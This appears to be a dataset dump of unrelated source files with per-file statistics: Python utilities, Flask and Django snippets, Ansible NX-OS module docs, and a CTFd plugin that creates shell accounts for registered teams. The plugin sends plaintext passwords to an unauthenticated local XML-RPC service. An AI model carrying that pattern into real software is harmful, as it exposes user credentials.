finalInput = collate_function(tokenizedDataset)
outputs = model(
input_ids=finalInput["input_ids"].to(model.encoder.device),
attention_mask=finalInput["attention_mask"].to(model.encoder.device),
filler_indecies=finalInput["filler_indecies"],
)
finalLabels = []
for item in outputs["classificationOutput"].reshape(-1):
if item == 0:
finalLabels.append("Implausible")
elif item == 1:
finalLabels.append("Neutral")
elif item == 2:
finalLabels.append("Plausible")
finalLabels = np.array(finalLabels)
return {
"labels": finalLabels,
"scores": outputs["regressionOutput"],
}
| 32.686354 | 210 | 0.663406 | 1,763 | 16,049 | 5.863868 | 0.196256 | 0.02573 | 0.008802 | 0.008125 | 0.22161 | 0.176823 | 0.126137 | 0.108145 | 0.099632 | 0.099632 | 0 | 0.010622 | 0.231541 | 16,049 | 490 | 211 | 32.753061 | 0.827617 | 0.070908 | 0 | 0.201705 | 1 | 0.002841 | 0.062105 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036932 | false | 0.002841 | 0.0625 | 0 | 0.144886 | 0.002841 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62defe5f6a2a05a1164bd7391f942132d33f8a26 | 1,703 | py | Python | fbchat/utils.py | Dainius14/fb-chat-bot-old | 6bdfa07e6a423e386ed61ce67ac218d806ad38f8 | [
"MIT"
] | 2 | 2018-04-05T14:07:16.000Z | 2020-11-03T06:08:09.000Z | fbchat/utils.py | Dainius14/fb-chat-bot-old | 6bdfa07e6a423e386ed61ce67ac218d806ad38f8 | [
"MIT"
] | null | null | null | fbchat/utils.py | Dainius14/fb-chat-bot-old | 6bdfa07e6a423e386ed61ce67ac218d806ad38f8 | [
"MIT"
] | 1 | 2018-04-05T14:17:44.000Z | 2018-04-05T14:17:44.000Z | import re
import json
from time import time
from random import random
USER_AGENTS = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/601.1.10 (KHTML, like Gecko) Version/8.0.5 Safari/601.1.10",
"Mozilla/5.0 (Windows NT 6.3; WOW64; ; NCT50_AAP285C84A1328) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1",
"Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6"
]
def now():
return int(time()*1000)
def get_json(text):
return json.loads(re.sub(r"^[^{]*", '', text, 1))
def digit_to_char(digit):
if digit < 10:
return str(digit)
return chr(ord('a') + digit - 10)
def str_base(number,base):
if number < 0:
return '-' + str_base(-number, base)
(d, m) = divmod(number, base)
if d > 0:
return str_base(d, base) + digit_to_char(m)
return digit_to_char(m)
def generateMessageID(client_id=None):
k = now()
l = int(random() * 4294967295)
return ("<%s:%s-%s@mail.projektitan.com>" % (k, l, client_id));
def getSignatureID():
return hex(int(random() * 2147483648))
def generateOfflineThreadingID() :
ret = now()
value = int(random() * 4294967295);
string = ("0000000000000000000000" + bin(value))[-22:]
msgs = bin(ret) + string
return str(int(msgs,2))
| 36.234043 | 139 | 0.656489 | 277 | 1,703 | 3.971119 | 0.350181 | 0.043636 | 0.049091 | 0.090909 | 0.286364 | 0.286364 | 0.227273 | 0.227273 | 0.227273 | 0.17 | 0 | 0.163441 | 0.180857 | 1,703 | 46 | 140 | 37.021739 | 0.62509 | 0 | 0 | 0 | 0 | 0.153846 | 0.442161 | 0.043453 | 0 | 0 | 0 | 0 | 0 | 1 | 0.179487 | false | 0 | 0.102564 | 0.076923 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
62e27fc7ce47704f27bdd2c667d663a58a6d3981 | 485 | py | Python | tetrad_cms/cases/tasks.py | UsernameForGerman/tetraD-NK | e00b406ac7b2ce63b92698c887fb53bf53344454 | [
"Apache-2.0"
] | null | null | null | tetrad_cms/cases/tasks.py | UsernameForGerman/tetraD-NK | e00b406ac7b2ce63b92698c887fb53bf53344454 | [
"Apache-2.0"
] | null | null | null | tetrad_cms/cases/tasks.py | UsernameForGerman/tetraD-NK | e00b406ac7b2ce63b92698c887fb53bf53344454 | [
"Apache-2.0"
] | null | null | null | from django.conf import settings
from requests import Session
import os
from json import dumps
from core.celery import app
@app.task(queue='cms')
def send_new_contact_to_admins(contact: dict, admins: list) -> None:
s = Session()
data = {'admins': admins, 'contact': contact}
url = settings.TELEGRAM_BOT_API_URL + 'send/contact'
try:
s.post(url, data=dumps(data), headers={'Content-Type': 'application/json'})
except BaseException as e:
print(e)
| 25.526316 | 83 | 0.694845 | 68 | 485 | 4.852941 | 0.617647 | 0.078788 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.185567 | 485 | 18 | 84 | 26.944444 | 0.835443 | 0 | 0 | 0 | 0 | 0 | 0.115702 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.357143 | 0 | 0.428571 | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
62e353f71bc5f0d9e24cfab6d427c04ff9186124 | 316 | py | Python | learning/example03_for.py | bokunimowakaru/iot | e2672a9b1dc0c4f3b57995daee634edce00a8029 | [
"MIT"
] | 6 | 2019-04-19T18:56:27.000Z | 2022-03-07T13:08:28.000Z | learning/example03_for.py | bokunimowakaru/iot | e2672a9b1dc0c4f3b57995daee634edce00a8029 | [
"MIT"
] | null | null | null | learning/example03_for.py | bokunimowakaru/iot | e2672a9b1dc0c4f3b57995daee634edce00a8029 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# coding: utf-8
# Example 03 コンピュータお得意の繰り返しfor文
from sys import argv # 本プログラムの引数argvを取得する
for name in argv: # 引数を変数nameへ代入
print('Hello,', name + '!') # 変数nameの内容を、文字列Helloに続いて表示
# for文の「argv」を「argv[1:]」にするとargv[1]以降の全引数を順次nameへ代入して繰り返す
| 28.727273 | 67 | 0.623418 | 33 | 316 | 5.969697 | 0.848485 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025974 | 0.268987 | 316 | 10 | 68 | 31.6 | 0.82684 | 0.566456 | 0 | 0 | 0 | 0 | 0.053846 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
62e5121cc3d103f5d833e64dac522900d5c6c105 | 468 | py | Python | 2020/02/07/An Introduction to Sessions in Flask/flask_session_example/app.py | kenjitagawa/youtube_video_code | ef3c48b9e136b3745d10395d94be64cb0a1f1c97 | [
"Unlicense"
] | 492 | 2019-06-25T12:54:31.000Z | 2022-03-30T12:38:28.000Z | 2020/02/07/An Introduction to Sessions in Flask/flask_session_example/app.py | kenjitagawa/youtube_video_code | ef3c48b9e136b3745d10395d94be64cb0a1f1c97 | [
"Unlicense"
] | 23 | 2019-10-01T01:36:08.000Z | 2022-02-10T12:46:16.000Z | 2020/02/07/An Introduction to Sessions in Flask/flask_session_example/app.py | kenjitagawa/youtube_video_code | ef3c48b9e136b3745d10395d94be64cb0a1f1c97 | [
"Unlicense"
] | 1,734 | 2019-06-03T06:25:13.000Z | 2022-03-31T23:57:53.000Z | from flask import Flask, render_template, session, redirect, url_for
app = Flask(__name__)
app.config['SECRET_KEY'] = 'prettyprinted'
@app.route('/')
def index():
return render_template('index.html')
@app.route('/set-background/<mode>')
def set_background(mode):
session['mode'] = mode
return redirect(url_for('index'))
@app.route('/drop-session')
def drop_session():
session.pop('mode', None)
return redirect(url_for('index')) | 26 | 69 | 0.675214 | 60 | 468 | 5.066667 | 0.433333 | 0.108553 | 0.138158 | 0.131579 | 0.164474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15812 | 468 | 18 | 70 | 26 | 0.771574 | 0 | 0 | 0.142857 | 0 | 0 | 0.192478 | 0.048673 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.071429 | 0.071429 | 0.5 | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62efb5daea165045f78966066a5dddd62fe07ac8 | 10,137 | py | Python | lib/python3.8/site-packages/ansible_collections/cisco/nxos/plugins/modules/nxos_l3_interfaces.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | null | null | null | lib/python3.8/site-packages/ansible_collections/cisco/nxos/plugins/modules/nxos_l3_interfaces.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | null | null | null | lib/python3.8/site-packages/ansible_collections/cisco/nxos/plugins/modules/nxos_l3_interfaces.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2019 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#############################################
# WARNING #
#############################################
#
# This file is auto generated by the resource
# module builder playbook.
#
# Do not edit this file manually.
#
# Changes to this file will be over written
# by the resource module builder.
#
# Changes should be made in the model used to
# generate this file or in the resource module
# builder template.
#
#############################################
"""
The module file for nxos_l3_interfaces
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
module: nxos_l3_interfaces
short_description: L3 interfaces resource module
description: This module manages Layer-3 interfaces attributes of NX-OS Interfaces.
version_added: 1.0.0
author: Trishna Guha (@trishnaguha)
notes:
- Tested against NXOS 7.3.(0)D1(1) on VIRL
options:
running_config:
description:
- This option is used only with state I(parsed).
- The value of this option should be the output received from the NX-OS device
by executing the command B(show running-config | section '^interface').
- The state I(parsed) reads the configuration from C(running_config) option and
transforms it into Ansible structured data as per the resource module's argspec
and the value is then returned in the I(parsed) key within the result.
type: str
config:
description: A dictionary of Layer-3 interface options
type: list
elements: dict
suboptions:
name:
description:
- Full name of L3 interface, i.e. Ethernet1/1.
type: str
required: true
dot1q:
description:
- Configures IEEE 802.1Q VLAN encapsulation on a subinterface.
type: int
ipv4:
description:
- IPv4 address and attributes of the L3 interface.
type: list
elements: dict
suboptions:
address:
description:
- IPV4 address of the L3 interface.
type: str
tag:
description:
- URIB route tag value for local/direct routes.
type: int
secondary:
description:
- A boolean attribute to manage addition of secondary IP address.
type: bool
default: false
ipv6:
description:
- IPv6 address and attributes of the L3 interface.
type: list
elements: dict
suboptions:
address:
description:
- IPV6 address of the L3 interface.
type: str
tag:
description:
- URIB route tag value for local/direct routes.
type: int
redirects:
description:
- Enables/disables ip redirects
type: bool
unreachables:
description:
- Enables/disables ip redirects
type: bool
evpn_multisite_tracking:
description:
- VxLAN evpn multisite Interface tracking. Supported only on selected model.
type: str
version_added: 1.1.0
choices:
- fabric-tracking
- dci-tracking
state:
description:
- The state of the configuration after module completion.
- The state I(overridden) would override the IP address configuration
of all interfaces on the device with the provided configuration in
the task. Use caution with this state as you may loose access to the
device.
type: str
choices:
- merged
- replaced
- overridden
- deleted
- gathered
- rendered
- parsed
default: merged
"""
EXAMPLES = """
# Using merged
# Before state:
# -------------
#
# interface Ethernet1/6
- name: Merge provided configuration with device configuration.
cisco.nxos.nxos_l3_interfaces:
config:
- name: Ethernet1/6
ipv4:
- address: 192.168.1.1/24
tag: 5
- address: 10.1.1.1/24
secondary: true
tag: 10
ipv6:
- address: fd5d:12c9:2201:2::1/64
tag: 6
- name: Ethernet1/7.42
dot1q: 42
redirects: false
unreachables: false
state: merged
# After state:
# ------------
#
# interface Ethernet1/6
# ip address 192.168.22.1/24 tag 5
# ip address 10.1.1.1/24 secondary tag 10
# interface Ethernet1/6
# ipv6 address fd5d:12c9:2201:2::1/64 tag 6
# interface Ethernet1/7.42
# encapsulation dot1q 42
# no ip redirects
# no ip unreachables
# Using replaced
# Before state:
# -------------
#
# interface Ethernet1/6
# ip address 192.168.22.1/24
# ipv6 address "fd5d:12c9:2201:1::1/64"
- name: Replace device configuration of specified L3 interfaces with provided configuration.
cisco.nxos.nxos_l3_interfaces:
config:
- name: Ethernet1/6
ipv4:
- address: 192.168.22.3/24
state: replaced
# After state:
# ------------
#
# interface Ethernet1/6
# ip address 192.168.22.3/24
# Using overridden
# Before state:
# -------------
#
# interface Ethernet1/2
# ip address 192.168.22.1/24
# interface Ethernet1/6
# ipv6 address "fd5d:12c9:2201:1::1/64"
- name: Override device configuration of all L3 interfaces on device with provided
configuration.
cisco.nxos.nxos_l3_interfaces:
config:
- name: Ethernet1/2
ipv4: 192.168.22.3/4
state: overridden
# After state:
# ------------
#
# interface Ethernet1/2
# ipv4 address 192.168.22.3/24
# interface Ethernet1/6
# Using deleted
# Before state:
# -------------
#
# interface Ethernet1/6
# ip address 192.168.22.1/24
# interface Ethernet1/2
# ipv6 address "fd5d:12c9:2201:1::1/64"
- name: Delete L3 attributes of given interfaces (This won't delete the interface
itself).
cisco.nxos.nxos_l3_interfaces:
config:
- name: Ethernet1/6
- name: Ethernet1/2
state: deleted
# After state:
# ------------
#
# interface Ethernet1/6
# interface Ethernet1/2
# Using rendered
- name: Use rendered state to convert task input to device specific commands
cisco.nxos.nxos_l3_interfaces:
config:
- name: Ethernet1/800
ipv4:
- address: 192.168.1.100/24
tag: 5
- address: 10.1.1.1/24
secondary: true
tag: 10
- name: Ethernet1/800
ipv6:
- address: fd5d:12c9:2201:2::1/64
tag: 6
state: rendered
# Task Output (redacted)
# -----------------------
# rendered:
# - "interface Ethernet1/800"
# - "ip address 192.168.1.100/24 tag 5"
# - "ip address 10.1.1.1/24 secondary tag 10"
# - "interface Ethernet1/800"
# - "ipv6 address fd5d:12c9:2201:2::1/64 tag 6"
# Using parsed
# parsed.cfg
# ------------
# interface Ethernet1/800
# ip address 192.168.1.100/24 tag 5
# ip address 10.1.1.1/24 secondary tag 10
# no ip redirects
# interface Ethernet1/801
# ipv6 address fd5d:12c9:2201:2::1/64 tag 6
# ip unreachables
# interface mgmt0
# ip address dhcp
# vrf member management
- name: Use parsed state to convert externally supplied config to structured format
cisco.nxos.nxos_l3_interfaces:
running_config: "{{ lookup('file', 'parsed.cfg') }}"
state: parsed
# Task output (redacted)
# -----------------------
# parsed:
# - name: Ethernet1/800
# ipv4:
# - address: 192.168.1.100/24
# tag: 5
# - address: 10.1.1.1/24
# secondary: True
# tag: 10
# redirects: False
# - name: Ethernet1/801
# ipv6:
# - address: fd5d:12c9:2201:2::1/64
# tag: 6
# unreachables: True
# Using gathered
# Existing device config state
# -------------------------------
# interface Ethernet1/1
# ip address 192.0.2.100/24
# interface Ethernet1/2
# no ip redirects
# ip address 203.0.113.10/24
# ip unreachables
# ipv6 address 2001:db8::1/32
- name: Gather l3_interfaces facts from the device using nxos_l3_interfaces
cisco.nxos.nxos_l3_interfaces:
state: gathered
# Task output (redacted)
# -----------------------
# gathered:
# - name: Ethernet1/1
# ipv4:
# - address: 192.0.2.100/24
# - name: Ethernet1/2
# ipv4:
# - address: 203.0.113.10/24
# ipv6:
# - address: 2001:db8::1/32
# redirects: False
# unreachables: True
"""
RETURN = """
before:
description: The configuration as structured data prior to module invocation.
returned: always
type: list
sample: >
The configuration returned will always be in the same format
of the parameters above.
after:
description: The configuration as structured data after module completion.
returned: when changed
type: list
sample: >
The configuration returned will always be in the same format
of the parameters above.
commands:
description: The set of commands pushed to the remote device.
returned: always
type: list
sample: ['interface Ethernet1/2', 'ip address 192.168.0.1/2']
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.cisco.nxos.plugins.module_utils.network.nxos.argspec.l3_interfaces.l3_interfaces import (
L3_interfacesArgs,
)
from ansible_collections.cisco.nxos.plugins.module_utils.network.nxos.config.l3_interfaces.l3_interfaces import (
L3_interfaces,
)
def main():
"""
Main entry point for module execution
:returns: the result form module invocation
"""
required_if = [
("state", "merged", ("config",)),
("state", "replaced", ("config",)),
("state", "overridden", ("config",)),
("state", "rendered", ("config",)),
("state", "parsed", ("running_config",)),
]
mutually_exclusive = [("config", "running_config")]
module = AnsibleModule(
argument_spec=L3_interfacesArgs.argument_spec,
required_if=required_if,
mutually_exclusive=mutually_exclusive,
supports_check_mode=True,
)
result = L3_interfaces(module).execute_module()
module.exit_json(**result)
if __name__ == "__main__":
main()
| 24.96798 | 114 | 0.625037 | 1,266 | 10,137 | 4.946288 | 0.230648 | 0.060364 | 0.026988 | 0.027308 | 0.413766 | 0.376397 | 0.334079 | 0.306931 | 0.301661 | 0.27068 | 0 | 0.073864 | 0.250765 | 10,137 | 405 | 115 | 25.02963 | 0.750625 | 0.05988 | 0 | 0.487805 | 0 | 0.003049 | 0.890042 | 0.057546 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003049 | false | 0 | 0.012195 | 0 | 0.015244 | 0.003049 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62f131f2fd644c186231aef33c85b6720ddcf3fc | 587 | py | Python | securesite/payroll/admin.py | simokauranen/payroll_api_localhost | 76cb4dede290afa1204236fb7b097eaeee61eb21 | [
"MIT"
] | null | null | null | securesite/payroll/admin.py | simokauranen/payroll_api_localhost | 76cb4dede290afa1204236fb7b097eaeee61eb21 | [
"MIT"
] | null | null | null | securesite/payroll/admin.py | simokauranen/payroll_api_localhost | 76cb4dede290afa1204236fb7b097eaeee61eb21 | [
"MIT"
] | null | null | null | """Module to add Employee fields to the User admin interface."""
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.models import User
from .models import Employee
class EmployeeInline(admin.StackedInline):
model = Employee
can_delete = False
max_num = 1
verbose_name_plural = 'employee'
class UserAdmin(BaseUserAdmin):
# Add the ssn, salary and last_updated fields to User admin view
inlines = (EmployeeInline,)
admin.site.unregister(User)
admin.site.register(User, UserAdmin)
| 23.48 | 68 | 0.758092 | 77 | 587 | 5.714286 | 0.532468 | 0.061364 | 0.115909 | 0.095455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002049 | 0.168654 | 587 | 24 | 69 | 24.458333 | 0.89959 | 0.207836 | 0 | 0 | 0 | 0 | 0.017505 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.307692 | 0 | 0.846154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
62f23976c671843e25e3faff67dcc2d0f2fe7178 | 1,332 | py | Python | qamplus/voice.py | qamplus/qamplus-pythonsdk | 5669e621018ffd6605354b672b446c3ad631665d | [
"MIT"
] | null | null | null | qamplus/voice.py | qamplus/qamplus-pythonsdk | 5669e621018ffd6605354b672b446c3ad631665d | [
"MIT"
] | null | null | null | qamplus/voice.py | qamplus/qamplus-pythonsdk | 5669e621018ffd6605354b672b446c3ad631665d | [
"MIT"
] | null | null | null |
class VoiceClient(object):
def __init__(self, base_obj):
self.base_obj = base_obj
self.api_resource = "/voice/v1/{}"
def create(self,
direction,
to,
caller_id,
execution_logic,
reference_logic='',
country_iso2='us',
technology='pstn',
status_callback_uri=''):
api_resource = self.api_resource.format(direction)
return self.base_obj.post(api_resource=api_resource, direction=direction, to=to,
caller_id=caller_id, execution_logic=execution_logic, reference_logic=reference_logic,
country_iso2=country_iso2, technology=technology, status_callback_uri=status_callback_uri)
def update(self, reference_id, execution_logic):
api_resource = self.api_resource.format(reference_id)
return self.base_obj.put(api_resource=api_resource,
execution_logic=execution_logic)
def delete(self, reference_id):
api_resource = self.api_resource.format(reference_id)
return self.base_obj.delete(api_resource=api_resource)
def get_status(self, reference_id):
api_resource = self.api_resource.format(reference_id)
return self.base_obj.get(api_resource=api_resource)
| 32.487805 | 102 | 0.652402 | 154 | 1,332 | 5.279221 | 0.227273 | 0.230012 | 0.081181 | 0.088561 | 0.371464 | 0.297663 | 0.258303 | 0.258303 | 0.258303 | 0.258303 | 0 | 0.004077 | 0.263514 | 1,332 | 40 | 103 | 33.3 | 0.824669 | 0 | 0 | 0.111111 | 0 | 0 | 0.013564 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.185185 | false | 0 | 0 | 0 | 0.37037 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62fd1da94147ad45face770be507f1eb73d0d1b2 | 404 | py | Python | test.py | quantumporium/shopping_cart_project | eae13f76fce82715ddbad5aebb73035b0e1ba258 | [
"MIT"
] | null | null | null | test.py | quantumporium/shopping_cart_project | eae13f76fce82715ddbad5aebb73035b0e1ba258 | [
"MIT"
] | null | null | null | test.py | quantumporium/shopping_cart_project | eae13f76fce82715ddbad5aebb73035b0e1ba258 | [
"MIT"
] | null | null | null | # good structure for an pytest test
from app import shopping_cart
def check_if_checkout_give_the_right_value():
'''
'''
arrange_array = [15,7, 10] # arrange
shopping_cart_array = shopping_cart.checkout(arrange_array) # act
assert shopping_cart_array == (31.99, 2.8, 34.79), "this check if the function checkout in shopping_cart work well."
check_if_checkout_give_the_right_value() | 36.727273 | 120 | 0.747525 | 62 | 404 | 4.532258 | 0.596774 | 0.213523 | 0.106762 | 0.135231 | 0.227758 | 0.227758 | 0.227758 | 0 | 0 | 0 | 0 | 0.044379 | 0.163366 | 404 | 11 | 121 | 36.727273 | 0.786982 | 0.111386 | 0 | 0 | 0 | 0 | 0.182609 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1a05c837044c86fc7d751b18c934f19ce77168a2 | 12,132 | py | Python | examples/challenges/shell-plugin/ctfd/CTFd/plugins/shell-plugin/shell.py | ameserole/Akeso | 868f280e88f44e65e44fbe2f6c43e6b7c92fbcab | [
"MIT"
] | 19 | 2018-02-26T00:19:17.000Z | 2019-12-18T04:26:45.000Z | examples/challenges/shell-plugin/ctfd/CTFd/plugins/shell-plugin/shell.py | ameserole/Akeso | 868f280e88f44e65e44fbe2f6c43e6b7c92fbcab | [
"MIT"
] | 11 | 2018-05-07T15:11:30.000Z | 2018-11-13T16:40:41.000Z | examples/challenges/shell-plugin/ctfd/CTFd/plugins/shell-plugin/shell.py | ameserole/Akeso | 868f280e88f44e65e44fbe2f6c43e6b7c92fbcab | [
"MIT"
] | 1 | 2018-08-28T15:50:09.000Z | 2018-08-28T15:50:09.000Z | import logging
import os
import re
import time
import urllib
from threading import Thread
import xmlrpclib
from Queue import Queue
from flask import current_app as app, render_template, request, redirect, abort, jsonify, json as json_mod, url_for, session, Blueprint
from itsdangerous import TimedSerializer, BadTimeSignature, Signer, BadSignature
from passlib.hash import bcrypt_sha256
from CTFd.utils import sha512, is_safe_url, authed, can_send_mail, sendmail, can_register, get_config, verify_email
from CTFd.models import db, Teams, Pages
import CTFd.auth
import CTFd.views
def create_user_thread(q):
while True:
user_pair = q.get(block=True)
shell = xmlrpclib.ServerProxy('http://localhost:8000',allow_none=True)
if user_pair[2] == "create":
shell.add_user(user_pair[0], user_pair[1])
elif user_pair[2] == "change":
shell.change_user(user_pair[0], user_pair[1])
def load(app):
shell = Blueprint('shell', __name__, template_folder='shell-templates')
app.register_blueprint(shell, url_prefix='/shell')
page = Pages('shell',""" """ )
auth = Blueprint('auth', __name__)
shellexists = Pages.query.filter_by(route='shell').first()
if not shellexists:
db.session.add(page)
db.session.commit()
@app.route('/shell', methods=['GET'])
def shell_view():
if not authed():
return redirect(url_for('auth.login', next=request.path))
return render_template('shell.html',root=request.script_root)
@app.route('/register', methods=['POST', 'GET'])
def register():
if not can_register():
return redirect(url_for('auth.login'))
if request.method == 'POST':
errors = []
name = request.form['name']
email = request.form['email']
password = request.form['password']
name_len = len(name) < 2
names = Teams.query.add_columns('name', 'id').filter_by(name=name).first()
emails = Teams.query.add_columns('email', 'id').filter_by(email=email).first()
pass_short = len(password) == 0
pass_long = len(password) > 32
valid_email = re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", request.form['email'])
if not valid_email:
errors.append("That email doesn't look right")
if names:
errors.append('That team name is already taken')
if emails:
errors.append('That email has already been used')
if pass_short:
errors.append('Pick a longer password')
if pass_long:
errors.append('Pick a shorter password')
if name_len:
errors.append('Pick a longer team name')
if len(errors) > 0:
return render_template('register.html', errors=errors, name=request.form['name'], email=request.form['email'], password=request.form['password'])
else:
with app.app_context():
team = Teams(name, email.lower(), password)
db.session.add(team)
db.session.commit()
db.session.flush()
shell = xmlrpclib.ServerProxy('http://localhost:8000',allow_none=True)
shell.add_user(name, password)
session['username'] = team.name
session['id'] = team.id
session['admin'] = team.admin
session['nonce'] = sha512(os.urandom(10))
if can_send_mail() and get_config('verify_emails'): # Confirming users is enabled and we can send email.
db.session.close()
logger = logging.getLogger('regs')
logger.warn("[{0}] {1} registered (UNCONFIRMED) with {2}".format(time.strftime("%m/%d/%Y %X"),
request.form['name'].encode('utf-8'),
request.form['email'].encode('utf-8')))
return redirect(url_for('auth.confirm_user'))
else: # Don't care about confirming users
if can_send_mail(): # We want to notify the user that they have registered.
sendmail(request.form['email'], "You've successfully registered for {}".format(get_config('ctf_name')))
db.session.close()
logger = logging.getLogger('regs')
logger.warn("[{0}] {1} registered with {2}".format(time.strftime("%m/%d/%Y %X"), request.form['name'].encode('utf-8'), request.form['email'].encode('utf-8')))
return redirect(url_for('challenges.challenges_view'))
else:
return render_template('register.html')
def reset_password(data=None):
if data is not None and request.method == "GET":
return render_template('reset_password.html', mode='set')
if data is not None and request.method == "POST":
try:
s = TimedSerializer(app.config['SECRET_KEY'])
name = s.loads(urllib.unquote_plus(data.decode('base64')), max_age=1800)
except BadTimeSignature:
return render_template('reset_password.html', errors=['Your link has expired'])
except:
return render_template('reset_password.html', errors=['Your link appears broken, please try again.'])
team = Teams.query.filter_by(name=name).first_or_404()
password = request.form['password'].strip()
name = team.name
pass_short = len(password) == 0
pass_long = len(password) > 32
#http://stackoverflow.com/questions/19605150/regex-for-password-must-be-contain-at-least-8-characters-least-1-number-and-bot
errors = []
if pass_short:
errors.append('Pick a longer password')
if pass_long:
errors.append('Pick a shorter password')
if len(errors) > 0:
return render_template('reset_password.html', errors=errors)
shell = xmlrpclib.ServerProxy('http://localhost:8000',allow_none=True)
shell.change_user(name, password)
team.password = bcrypt_sha256.encrypt(password)
db.session.commit()
db.session.close()
return redirect(url_for('auth.login'))
if request.method == 'POST':
email = request.form['email'].strip()
team = Teams.query.filter_by(email=email).first()
if not team:
return render_template('reset_password.html', errors=['If that account exists you will receive an email, please check your inbox'])
s = TimedSerializer(app.config['SECRET_KEY'])
token = s.dumps(team.name)
text = """
Did you initiate a password reset?
{0}/{1}
""".format(url_for('auth.reset_password', _external=True), urllib.quote_plus(token.encode('base64')))
sendmail(email, text)
return render_template('reset_password.html', errors=['If that account exists you will receive an email, please check your inbox'])
return render_template('reset_password.html')
def profile():
if authed():
if request.method == "POST":
errors = []
